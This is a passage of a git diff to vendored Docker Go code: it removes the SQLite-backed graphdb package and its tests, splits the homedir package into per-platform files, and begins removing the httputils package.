!= nil { - tx.Rollback() - return nil, err - } - } else { - tx.Rollback() - return nil, err - } - } - e := &Entity{id} - - parentPath, name := splitPath(fullPath) - if err := db.setEdge(parentPath, name, e, tx); err != nil { - tx.Rollback() - return nil, err - } - - if err := tx.Commit(); err != nil { - return nil, err - } - return e, nil -} - -// Exists returns true if a name already exists in the database. -func (db *Database) Exists(name string) bool { - db.mux.RLock() - defer db.mux.RUnlock() - - e, err := db.get(name) - if err != nil { - return false - } - return e != nil -} - -func (db *Database) setEdge(parentPath, name string, e *Entity, tx *sql.Tx) error { - parent, err := db.get(parentPath) - if err != nil { - return err - } - if parent.id == e.id { - return fmt.Errorf("Cannot set self as child") - } - - if _, err := tx.Exec("INSERT INTO edge (parent_id, name, entity_id) VALUES (?,?,?);", parent.id, name, e.id); err != nil { - return err - } - return nil -} - -// RootEntity returns the root "/" entity for the database. -func (db *Database) RootEntity() *Entity { - return &Entity{ - id: "0", - } -} - -// Get returns the entity for a given path. -func (db *Database) Get(name string) *Entity { - db.mux.RLock() - defer db.mux.RUnlock() - - e, err := db.get(name) - if err != nil { - return nil - } - return e -} - -func (db *Database) get(name string) (*Entity, error) { - e := db.RootEntity() - // We always know the root name so return it if - // it is requested - if name == "/" { - return e, nil - } - - parts := split(name) - for i := 1; i < len(parts); i++ { - p := parts[i] - if p == "" { - continue - } - - next := db.child(e, p) - if next == nil { - return nil, fmt.Errorf("Cannot find child for %s", name) - } - e = next - } - return e, nil - -} - -// List all entities by from the name. -// The key will be the full path of the entity. -func (db *Database) List(name string, depth int) Entities { - db.mux.RLock() - defer db.mux.RUnlock() - - out := Entities{} - e, err := db.get(name) - if err != nil { - return out - } - - children, err := db.children(e, name, depth, nil) - if err != nil { - return out - } - - for _, c := range children { - out[c.FullPath] = c.Entity - } - return out -} - -// Walk through the child graph of an entity, calling walkFunc for each child entity. -// It is safe for walkFunc to call graph functions. -func (db *Database) Walk(name string, walkFunc WalkFunc, depth int) error { - children, err := db.Children(name, depth) - if err != nil { - return err - } - - // Note: the database lock must not be held while calling walkFunc - for _, c := range children { - if err := walkFunc(c.FullPath, c.Entity); err != nil { - return err - } - } - return nil -} - -// Children returns the children of the specified entity. -func (db *Database) Children(name string, depth int) ([]WalkMeta, error) { - db.mux.RLock() - defer db.mux.RUnlock() - - e, err := db.get(name) - if err != nil { - return nil, err - } - - return db.children(e, name, depth, nil) -} - -// Parents returns the parents of a specified entity. -func (db *Database) Parents(name string) ([]string, error) { - db.mux.RLock() - defer db.mux.RUnlock() - - e, err := db.get(name) - if err != nil { - return nil, err - } - return db.parents(e) -} - -// Refs returns the reference count for a specified id. -func (db *Database) Refs(id string) int { - db.mux.RLock() - defer db.mux.RUnlock() - - var count int - if err := db.conn.QueryRow("SELECT COUNT(*) FROM edge WHERE entity_id = ?;", id).Scan(&count); err != nil { - return 0 - } - return count -} - -// RefPaths returns all the id's path references. -func (db *Database) RefPaths(id string) Edges { - db.mux.RLock() - defer db.mux.RUnlock() - - refs := Edges{} - - rows, err := db.conn.Query("SELECT name, parent_id FROM edge WHERE entity_id = ?;", id) - if err != nil { - return refs - } - defer rows.Close() - - for rows.Next() { - var name string - var parentID string - if err := rows.Scan(&name, &parentID); err != nil { - return refs - } - refs = append(refs, &Edge{ - EntityID: id, - Name: name, - ParentID: parentID, - }) - } - return refs -} - -// Delete the reference to an entity at a given path. -func (db *Database) Delete(name string) error { - db.mux.Lock() - defer db.mux.Unlock() - - if name == "/" { - return fmt.Errorf("Cannot delete root entity") - } - - parentPath, n := splitPath(name) - parent, err := db.get(parentPath) - if err != nil { - return err - } - - if _, err := db.conn.Exec("DELETE FROM edge WHERE parent_id = ? AND name = ?;", parent.id, n); err != nil { - return err - } - return nil -} - -// Purge removes the entity with the specified id -// Walk the graph to make sure all references to the entity -// are removed and return the number of references removed -func (db *Database) Purge(id string) (int, error) { - db.mux.Lock() - defer db.mux.Unlock() - - tx, err := db.conn.Begin() - if err != nil { - return -1, err - } - - // Delete all edges - rows, err := tx.Exec("DELETE FROM edge WHERE entity_id = ?;", id) - if err != nil { - tx.Rollback() - return -1, err - } - changes, err := rows.RowsAffected() - if err != nil { - return -1, err - } - - // Clear who's using this id as parent - refs, err := tx.Exec("DELETE FROM edge WHERE parent_id = ?;", id) - if err != nil { - tx.Rollback() - return -1, err - } - refsCount, err := refs.RowsAffected() - if err != nil { - return -1, err - } - - // Delete entity - if _, err := tx.Exec("DELETE FROM entity where id = ?;", id); err != nil { - tx.Rollback() - return -1, err - } - - if err := tx.Commit(); err != nil { - return -1, err - } - - return int(changes + refsCount), nil -} - -// Rename an edge for a given path -func (db *Database) Rename(currentName, newName string) error { - db.mux.Lock() - defer db.mux.Unlock() - - parentPath, name := splitPath(currentName) - newParentPath, newEdgeName := splitPath(newName) - - if parentPath != newParentPath { - return fmt.Errorf("Cannot rename when root paths do not match %s != %s", parentPath, newParentPath) - } - - parent, err := db.get(parentPath) - if err != nil { - return err - } - - rows, err := db.conn.Exec("UPDATE edge SET name = ? WHERE parent_id = ? AND name = ?;", newEdgeName, parent.id, name) - if err != nil { - return err - } - i, err := rows.RowsAffected() - if err != nil { - return err - } - if i == 0 { - return fmt.Errorf("Cannot locate edge for %s %s", parent.id, name) - } - return nil -} - -// WalkMeta stores the walk metadata. -type WalkMeta struct { - Parent *Entity - Entity *Entity - FullPath string - Edge *Edge -} - -func (db *Database) children(e *Entity, name string, depth int, entities []WalkMeta) ([]WalkMeta, error) { - if e == nil { - return entities, nil - } - - rows, err := db.conn.Query("SELECT entity_id, name FROM edge where parent_id = ?;", e.id) - if err != nil { - return nil, err - } - defer rows.Close() - - for rows.Next() { - var entityID, entityName string - if err := rows.Scan(&entityID, &entityName); err != nil { - return nil, err - } - child := &Entity{entityID} - edge := &Edge{ - ParentID: e.id, - Name: entityName, - EntityID: child.id, - } - - meta := WalkMeta{ - Parent: e, - Entity: child, - FullPath: path.Join(name, edge.Name), - Edge: edge, - } - - entities = append(entities, meta) - - if depth != 0 { - nDepth := depth - if depth != -1 { - nDepth-- - } - entities, err = db.children(child, meta.FullPath, nDepth, entities) - if err != nil { - return nil, err - } - } - } - - return entities, nil -} - -func (db *Database) parents(e *Entity) (parents []string, err error) { - if e == nil { - return parents, nil - } - - rows, err := db.conn.Query("SELECT parent_id FROM edge where entity_id = ?;", e.id) - if err != nil { - return nil, err - } - defer rows.Close() - - for rows.Next() { - var parentID string - if err := rows.Scan(&parentID); err != nil { - return nil, err - } - parents = append(parents, parentID) - } - - return parents, nil -} - -// Return the entity based on the parent path and name. -func (db *Database) child(parent *Entity, name string) *Entity { - var id string - if err := db.conn.QueryRow("SELECT entity_id FROM edge WHERE parent_id = ? AND name = ?;", parent.id, name).Scan(&id); err != nil { - return nil - } - return &Entity{id} -} - -// ID returns the id used to reference this entity. -func (e *Entity) ID() string { - return e.id -} - -// Paths returns the paths sorted by depth. -func (e Entities) Paths() []string { - out := make([]string, len(e)) - var i int - for k := range e { - out[i] = k - i++ - } - sortByDepth(out) - - return out -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go deleted file mode 100644 index f0fb074b4d..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go +++ /dev/null @@ -1,721 +0,0 @@ -package graphdb - -import ( - "database/sql" - "fmt" - "os" - "path" - "runtime" - "strconv" - "testing" - - _ "github.com/mattn/go-sqlite3" -) - -func newTestDb(t *testing.T) (*Database, string) { - p := path.Join(os.TempDir(), "sqlite.db") - conn, err := sql.Open("sqlite3", p) - db, err := NewDatabase(conn) - if err != nil { - t.Fatal(err) - } - return db, p -} - -func destroyTestDb(dbPath string) { - os.Remove(dbPath) -} - -func TestNewDatabase(t *testing.T) { - db, dbpath := newTestDb(t) - if db == nil { - t.Fatal("Database should not be nil") - } - db.Close() - defer destroyTestDb(dbpath) -} - -func TestCreateRootEntity(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - root := db.RootEntity() - if root == nil { - t.Fatal("Root entity should not be nil") - } -} - -func TestGetRootEntity(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - e := db.Get("/") - if e == nil { - t.Fatal("Entity should not be nil") - } - if e.ID() != "0" { - t.Fatalf("Entity id should be 0, got %s", e.ID()) - } -} - -func TestSetEntityWithDifferentName(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/test", "1") - if _, err := db.Set("/other", "1"); err != nil { - t.Fatal(err) - } -} - -func TestSetDuplicateEntity(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - if _, err := db.Set("/foo", "42"); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/foo", "43"); err == nil { - t.Fatalf("Creating an entry with a duplicate path did not cause an error") - } -} - -func TestCreateChild(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - child, err := db.Set("/db", "1") - if err != nil { - t.Fatal(err) - } - if child == nil { - t.Fatal("Child should not be nil") - } - if child.ID() != "1" { - t.Fail() - } -} - -func TestParents(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - for i := 1; i < 6; i++ { - a := strconv.Itoa(i) - if _, err := db.Set("/"+a, a); err != nil { - t.Fatal(err) - } - } - - for i := 6; i < 11; i++ { - a := strconv.Itoa(i) - p := strconv.Itoa(i - 5) - - key := fmt.Sprintf("/%s/%s", p, a) - - if _, err := db.Set(key, a); err != nil { - t.Fatal(err) - } - - parents, err := db.Parents(key) - if err != nil { - t.Fatal(err) - } - - if len(parents) != 1 { - t.Fatalf("Expected 1 entry for %s got %d", key, len(parents)) - } - - if parents[0] != p { - t.Fatalf("ID %s received, %s expected", parents[0], p) - } - } -} - -func TestChildren(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - str := "/" - for i := 1; i < 6; i++ { - a := strconv.Itoa(i) - if _, err := db.Set(str+a, a); err != nil { - t.Fatal(err) - } - - str = str + a + "/" - } - - str = "/" - for i := 10; i < 30; i++ { // 20 entities - a := strconv.Itoa(i) - if _, err := db.Set(str+a, a); err != nil { - t.Fatal(err) - } - - str = str + a + "/" - } - entries, err := db.Children("/", 5) - if err != nil { - t.Fatal(err) - } - - if len(entries) != 11 { - t.Fatalf("Expect 11 entries for / got %d", len(entries)) - } - - entries, err = db.Children("/", 20) - if err != nil { - t.Fatal(err) - } - - if len(entries) != 25 { - t.Fatalf("Expect 25 entries for / got %d", len(entries)) - } -} - -func TestListAllRootChildren(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - for i := 1; i < 6; i++ { - a := strconv.Itoa(i) - if _, err := db.Set("/"+a, a); err != nil { - t.Fatal(err) - } - } - entries := db.List("/", -1) - if len(entries) != 5 { - t.Fatalf("Expect 5 entries for / got %d", len(entries)) - } -} - -func TestListAllSubChildren(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - _, err := db.Set("/webapp", "1") - if err != nil { - t.Fatal(err) - } - child2, err := db.Set("/db", "2") - if err != nil { - t.Fatal(err) - } - child4, err := db.Set("/logs", "4") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/db/logs", child4.ID()); err != nil { - t.Fatal(err) - } - - child3, err := db.Set("/sentry", "3") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/db", child2.ID()); err != nil { - t.Fatal(err) - } - - entries := db.List("/webapp", 1) - if len(entries) != 3 { - t.Fatalf("Expect 3 entries for / got %d", len(entries)) - } - - entries = db.List("/webapp", 0) - if len(entries) != 2 { - t.Fatalf("Expect 2 entries for / got %d", len(entries)) - } -} - -func TestAddSelfAsChild(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - child, err := db.Set("/test", "1") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/test/other", child.ID()); err == nil { - t.Fatal("Error should not be nil") - } -} - -func TestAddChildToNonExistentRoot(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - if _, err := db.Set("/myapp", "1"); err != nil { - t.Fatal(err) - } - - if _, err := db.Set("/myapp/proxy/db", "2"); err == nil { - t.Fatal("Error should not be nil") - } -} - -func TestWalkAll(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - _, err := db.Set("/webapp", "1") - if err != nil { - t.Fatal(err) - } - child2, err := db.Set("/db", "2") - if err != nil { - t.Fatal(err) - } - child4, err := db.Set("/db/logs", "4") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/logs", child4.ID()); err != nil { - t.Fatal(err) - } - - child3, err := db.Set("/sentry", "3") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/db", child2.ID()); err != nil { - t.Fatal(err) - } - - child5, err := db.Set("/gograph", "5") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { - t.Fatal(err) - } - - if err := db.Walk("/", func(p string, e *Entity) error { - t.Logf("Path: %s Entity: %s", p, e.ID()) - return nil - }, -1); err != nil { - t.Fatal(err) - } -} - -func TestGetEntityByPath(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - _, err := db.Set("/webapp", "1") - if err != nil { - t.Fatal(err) - } - child2, err := db.Set("/db", "2") - if err != nil { - t.Fatal(err) - } - child4, err := db.Set("/logs", "4") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/db/logs", child4.ID()); err != nil { - t.Fatal(err) - } - - child3, err := db.Set("/sentry", "3") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/db", child2.ID()); err != nil { - t.Fatal(err) - } - - child5, err := db.Set("/gograph", "5") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { - t.Fatal(err) - } - - entity := db.Get("/webapp/db/logs") - if entity == nil { - t.Fatal("Entity should not be nil") - } - if entity.ID() != "4" { - t.Fatalf("Expected to get entity with id 4, got %s", entity.ID()) - } -} - -func TestEnitiesPaths(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - _, err := db.Set("/webapp", "1") - if err != nil { - t.Fatal(err) - } - child2, err := db.Set("/db", "2") - if err != nil { - t.Fatal(err) - } - child4, err := db.Set("/logs", "4") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/db/logs", child4.ID()); err != nil { - t.Fatal(err) - } - - child3, err := db.Set("/sentry", "3") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/db", child2.ID()); err != nil { - t.Fatal(err) - } - - child5, err := db.Set("/gograph", "5") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { - t.Fatal(err) - } - - out := db.List("/", -1) - for _, p := range out.Paths() { - t.Log(p) - } -} - -func TestDeleteRootEntity(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - if err := db.Delete("/"); err == nil { - t.Fatal("Error should not be nil") - } -} - -func TestDeleteEntity(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - _, err := db.Set("/webapp", "1") - if err != nil { - t.Fatal(err) - } - child2, err := db.Set("/db", "2") - if err != nil { - t.Fatal(err) - } - child4, err := db.Set("/logs", "4") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/db/logs", child4.ID()); err != nil { - t.Fatal(err) - } - - child3, err := db.Set("/sentry", "3") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/db", child2.ID()); err != nil { - t.Fatal(err) - } - - child5, err := db.Set("/gograph", "5") - if err != nil { - t.Fatal(err) - } - if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil { - t.Fatal(err) - } - - if err := db.Delete("/webapp/sentry"); err != nil { - t.Fatal(err) - } - entity := db.Get("/webapp/sentry") - if entity != nil { - t.Fatal("Entity /webapp/sentry should be nil") - } -} - -func TestCountRefs(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/webapp", "1") - - if db.Refs("1") != 1 { - t.Fatal("Expect reference count to be 1") - } - - db.Set("/db", "2") - db.Set("/webapp/db", "2") - if db.Refs("2") != 2 { - t.Fatal("Expect reference count to be 2") - } -} - -func TestPurgeId(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/webapp", "1") - - if c := db.Refs("1"); c != 1 { - t.Fatalf("Expect reference count to be 1, got %d", c) - } - - db.Set("/db", "2") - db.Set("/webapp/db", "2") - - count, err := db.Purge("2") - if err != nil { - t.Fatal(err) - } - if count != 2 { - t.Fatalf("Expected 2 references to be removed, got %d", count) - } -} - -// Regression test https://github.com/docker/docker/issues/12334 -func TestPurgeIdRefPaths(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/webapp", "1") - db.Set("/db", "2") - - db.Set("/db/webapp", "1") - - if c := db.Refs("1"); c != 2 { - t.Fatalf("Expected 2 reference for webapp, got %d", c) - } - if c := db.Refs("2"); c != 1 { - t.Fatalf("Expected 1 reference for db, got %d", c) - } - - if rp := db.RefPaths("2"); len(rp) != 1 { - t.Fatalf("Expected 1 reference path for db, got %d", len(rp)) - } - - count, err := db.Purge("2") - if err != nil { - t.Fatal(err) - } - - if count != 2 { - t.Fatalf("Expected 2 rows to be removed, got %d", count) - } - - if c := db.Refs("2"); c != 0 { - t.Fatalf("Expected 0 reference for db, got %d", c) - } - if c := db.Refs("1"); c != 1 { - t.Fatalf("Expected 1 reference for webapp, got %d", c) - } -} - -func TestRename(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/webapp", "1") - - if db.Refs("1") != 1 { - t.Fatal("Expect reference count to be 1") - } - - db.Set("/db", "2") - db.Set("/webapp/db", "2") - - if db.Get("/webapp/db") == nil { - t.Fatal("Cannot find entity at path /webapp/db") - } - - if err := db.Rename("/webapp/db", "/webapp/newdb"); err != nil { - t.Fatal(err) - } - if db.Get("/webapp/db") != nil { - t.Fatal("Entity should not exist at /webapp/db") - } - if db.Get("/webapp/newdb") == nil { - t.Fatal("Cannot find entity at path /webapp/newdb") - } - -} - -func TestCreateMultipleNames(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/db", "1") - if _, err := db.Set("/myapp", "1"); err != nil { - t.Fatal(err) - } - - db.Walk("/", func(p string, e *Entity) error { - t.Logf("%s\n", p) - return nil - }, -1) -} - -func TestRefPaths(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/webapp", "1") - - db.Set("/db", "2") - db.Set("/webapp/db", "2") - - refs := db.RefPaths("2") - if len(refs) != 2 { - t.Fatalf("Expected reference count to be 2, got %d", len(refs)) - } -} - -func TestExistsTrue(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/testing", "1") - - if !db.Exists("/testing") { - t.Fatalf("/tesing should exist") - } -} - -func TestExistsFalse(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/toerhe", "1") - - if db.Exists("/testing") { - t.Fatalf("/tesing should not exist") - } - -} - -func TestGetNameWithTrailingSlash(t *testing.T) { - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - db.Set("/todo", "1") - - e := db.Get("/todo/") - if e == nil { - t.Fatalf("Entity should not be nil") - } -} - -func TestConcurrentWrites(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - db, dbpath := newTestDb(t) - defer destroyTestDb(dbpath) - - errs := make(chan error, 2) - - save := func(name string, id string) { - if _, err := db.Set(fmt.Sprintf("/%s", name), id); err != nil { - errs <- err - } - errs <- nil - } - purge := func(id string) { - if _, err := db.Purge(id); err != nil { - errs <- err - } - errs <- nil - } - - save("/1", "1") - - go purge("1") - go save("/2", "2") - - any := false - for i := 0; i < 2; i++ { - if err := <-errs; err != nil { - any = true - t.Log(err) - } - } - if any { - t.Fail() - } -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go deleted file mode 100644 index c07df077d8..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go +++ /dev/null @@ -1,27 +0,0 @@ -package graphdb - -import "sort" - -type pathSorter struct { - paths []string - by func(i, j string) bool -} - -func sortByDepth(paths []string) { - s := &pathSorter{paths, func(i, j string) bool { - return PathDepth(i) > PathDepth(j) - }} - sort.Sort(s) -} - -func (s *pathSorter) Len() int { - return len(s.paths) -} - -func (s *pathSorter) Swap(i, j int) { - s.paths[i], s.paths[j] = s.paths[j], s.paths[i] -} - -func (s *pathSorter) Less(i, j int) bool { - return s.by(s.paths[i], s.paths[j]) -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go deleted file mode 100644 index ddf2266f60..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go +++ /dev/null @@ -1,29 +0,0 @@ -package graphdb - -import ( - "testing" -) - -func TestSort(t *testing.T) { - paths := []string{ - "/", - "/myreallylongname", - "/app/db", - } - - sortByDepth(paths) - - if len(paths) != 3 { - t.Fatalf("Expected 3 parts got %d", len(paths)) - } - - if paths[0] != "/app/db" { - t.Fatalf("Expected /app/db got %s", paths[0]) - } - if paths[1] != "/myreallylongname" { - t.Fatalf("Expected /myreallylongname got %s", paths[1]) - } - if paths[2] != "/" { - t.Fatalf("Expected / got %s", paths[2]) - } -} diff --git a/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go b/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go deleted file mode 100644 index 2b8ba71724..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go +++ /dev/null @@ -1,3 +0,0 @@ -// +build !cgo !linux - -package graphdb diff --git a/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go deleted file mode 100644 index 9edd79c35e..0000000000 --- a/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go +++ /dev/null @@ -1,32 +0,0 @@ -package graphdb - -import ( - "path" - "strings" -) - -// Split p on / -func split(p string) []string { - return strings.Split(p, "/") -} - -// PathDepth returns the depth or number of / in a given path -func PathDepth(p string) int { - parts := split(p) - if len(parts) == 2 && parts[1] == "" { - return 1 - } - return len(parts) -} - -func splitPath(p string) (parent, name string) { - if p[0] != '/' { - p = "/" + p - } - parent, name = path.Split(p) - l := len(parent) - if parent[l-1] == '/' { - parent = parent[:l-1] - } - return -} diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go new file mode 100644 index 0000000000..ee15ed52b1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go @@ -0,0 +1,21 @@ +package homedir // import "github.com/docker/docker/pkg/homedir" + +import ( + "os" + + "github.com/docker/docker/pkg/idtools" +) + +// GetStatic returns the home directory for the current user without calling +// os/user.Current(). This is useful for static-linked binary on glibc-based +// system, because a call to os/user.Current() in a static binary leads to +// segfault due to a glibc issue that won't be fixed in a short term. +// (#29344, golang/go#13470, https://sourceware.org/bugzilla/show_bug.cgi?id=19341) +func GetStatic() (string, error) { + uid := os.Getuid() + usr, err := idtools.LookupUID(uid) + if err != nil { + return "", err + } + return usr.Home, nil +} diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_others.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_others.go new file mode 100644 index 0000000000..75ada2fe54 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_others.go @@ -0,0 +1,13 @@ +// +build !linux + +package homedir // import "github.com/docker/docker/pkg/homedir" + +import ( + "errors" +) + +// GetStatic is not needed for non-linux systems. +// (Precisely, it is needed only for glibc-based linux systems.) +func GetStatic() (string, error) { + return "", errors.New("homedir.GetStatic() is not supported on this system") +} diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go index 7a95cb2bd7..49c42224fd 100644 --- a/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go @@ -1,4 +1,4 @@ -package homedir +package homedir // import "github.com/docker/docker/pkg/homedir" import ( "path/filepath" diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_unix.go similarity index 75% rename from vendor/github.com/docker/docker/pkg/homedir/homedir.go rename to vendor/github.com/docker/docker/pkg/homedir/homedir_unix.go index 8154e83f0c..d85e124488 100644 --- a/vendor/github.com/docker/docker/pkg/homedir/homedir.go +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_unix.go @@ -1,8 +1,9 @@ -package homedir +// +build !windows + +package homedir // import "github.com/docker/docker/pkg/homedir" import ( "os" - "runtime" "github.com/opencontainers/runc/libcontainer/user" ) @@ -10,9 +11,6 @@ import ( // Key returns the env var name for the user's home dir based on // the platform being run on func Key() string { - if runtime.GOOS == "windows" { - return "USERPROFILE" - } return "HOME" } @@ -21,7 +19,7 @@ func Key() string { // Returned path should be used with "path/filepath" to form new paths. func Get() string { home := os.Getenv(Key()) - if home == "" && runtime.GOOS != "windows" { + if home == "" { if u, err := user.CurrentUser(); err == nil { return u.Home } @@ -32,8 +30,5 @@ func Get() string { // GetShortcutString returns the string that is shortcut to user's home directory // in the native shell of the platform running on. func GetShortcutString() string { - if runtime.GOOS == "windows" { - return "%USERPROFILE%" // be careful while using in format functions - } return "~" } diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go new file mode 100644 index 0000000000..2f81813b28 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go @@ -0,0 +1,24 @@ +package homedir // import "github.com/docker/docker/pkg/homedir" + +import ( + "os" +) + +// Key returns the env var name for the user's home dir based on +// the platform being run on +func Key() string { + return "USERPROFILE" +} + +// Get returns the home directory of the current user with the help of +// environment variables depending on the target operating system. +// Returned path should be used with "path/filepath" to form new paths. +func Get() string { + return os.Getenv(Key()) +} + +// GetShortcutString returns the string that is shortcut to user's home directory +// in the native shell of the platform running on. +func GetShortcutString() string { + return "%USERPROFILE%" // be careful while using in format functions +} diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils.go b/vendor/github.com/docker/docker/pkg/httputils/httputils.go deleted file mode 100644 index d7dc43877d..0000000000 --- a/vendor/github.com/docker/docker/pkg/httputils/httputils.go +++ /dev/null @@ -1,56 +0,0 @@ -package httputils - -import ( - "errors" - "fmt" - "net/http" - "regexp" - "strings" - - "github.com/docker/docker/pkg/jsonmessage" -) - -var ( - headerRegexp = regexp.MustCompile(`^(?:(.+)/(.+?))\((.+)\).*$`) - errInvalidHeader = errors.New("Bad header, should be in format `docker/version (platform)`") -) - -// Download requests a given URL and returns an io.Reader. -func Download(url string) (resp *http.Response, err error) { - if resp, err = http.Get(url); err != nil { - return nil, err - } - if resp.StatusCode >= 400 { - return nil, fmt.Errorf("Got HTTP status code >= 400: %s", resp.Status) - } - return resp, nil -} - -// NewHTTPRequestError returns a JSON response error. -func NewHTTPRequestError(msg string, res *http.Response) error { - return &jsonmessage.JSONError{ - Message: msg, - Code: res.StatusCode, - } -} - -// ServerHeader contains the server information. -type ServerHeader struct { - App string // docker - Ver string // 1.8.0-dev - OS string // windows or linux -} - -// ParseServerHeader extracts pieces from an 